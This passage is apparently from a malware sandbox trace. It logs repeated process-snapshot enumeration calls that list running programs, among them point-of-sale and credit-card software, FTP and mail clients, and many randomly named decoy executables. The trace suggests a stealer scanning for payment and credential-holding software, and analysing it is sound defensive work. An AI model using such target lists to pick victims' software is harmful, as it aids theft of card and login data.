dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0284.458] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0284.460] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0284.462] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0284.463] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0284.488] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0284.489] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0284.491] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0284.492] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0284.494] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0284.495] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0284.497] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0284.499] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0284.500] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0284.502] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0284.503] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0284.505] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0284.506] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0284.508] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0284.509] CloseHandle (hObject=0x2170) returned 1 [0284.509] Sleep (dwMilliseconds=0x64) [0284.626] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0284.641] Process32First (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.642] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0284.644] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0284.645] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0284.647] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0284.648] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0284.650] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0284.651] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0284.653] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0284.657] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.658] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.660] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0284.661] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.663] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.664] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.666] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.667] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.719] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.721] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.723] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0284.725] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0284.726] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0284.728] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.730] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0284.734] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0284.736] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0284.737] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0284.739] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.740] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0284.742] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0284.743] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0284.745] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0284.749] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0284.751] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0284.753] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0284.754] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0284.756] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0284.757] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0284.759] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0284.761] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0284.801] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0284.803] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0284.804] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0284.805] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0284.807] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0284.809] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0284.814] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0284.815] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0284.817] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0284.819] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0284.820] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0284.822] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0284.824] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0284.829] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0284.831] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0284.832] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0284.834] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0284.836] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0284.838] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0284.840] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0284.860] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0284.862] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0284.864] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0284.866] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0284.868] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 